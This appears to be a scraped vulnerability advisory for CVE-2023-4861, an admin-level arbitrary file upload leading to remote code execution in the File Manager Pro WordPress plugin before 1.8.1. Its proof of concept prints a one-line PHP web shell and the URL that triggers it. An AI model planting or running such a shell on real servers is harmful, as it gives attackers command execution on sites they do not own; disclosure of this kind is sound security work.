Lucene search
Alex SanfordWPEX-ID:7FA03F00-25C7-4E40-8592-BB4001CE019DHistorySep 19, 2023 - 12:00 a.m.
File Manager Pro < 1.8.1 - Admin+ Remote Code Execution
2023-09-1900:00:00
Alex Sanford
30
admin
file manager
remote code execution
exploit
security document
0.001 Low
EPSS
Percentile
43.7%
Description The plugin allows admin users to upload arbitrary files, even in environments where such a user should not be able to gain full control of the server, such as a multisite installation. This leads to remote code execution.
As an admin, use the File Manager UI to upload a file `shell.php` with the following contents:
<?php echo system($_GET['cmd']);
Visit `/shell.php?cmd=id` to trigger RCE.Related
nvd
nvd
CVE-2023-4861
2023-10-16 20:15:17
prion
prion
Remote code execution
2023-10-16 20:15:00
cve
cve
CVE-2023-4861
2023-10-16 20:15:17
cvelist
cvelist
CVE-2023-4861 File Manager Pro < 1.8.1 - Admin+ Remote Code Execution
2023-10-16 19:39:21
wpvulndb
wpvulndb
File Manager Pro < 1.8.1 - Admin+ Remote Code Execution
2023-09-19 00:00:00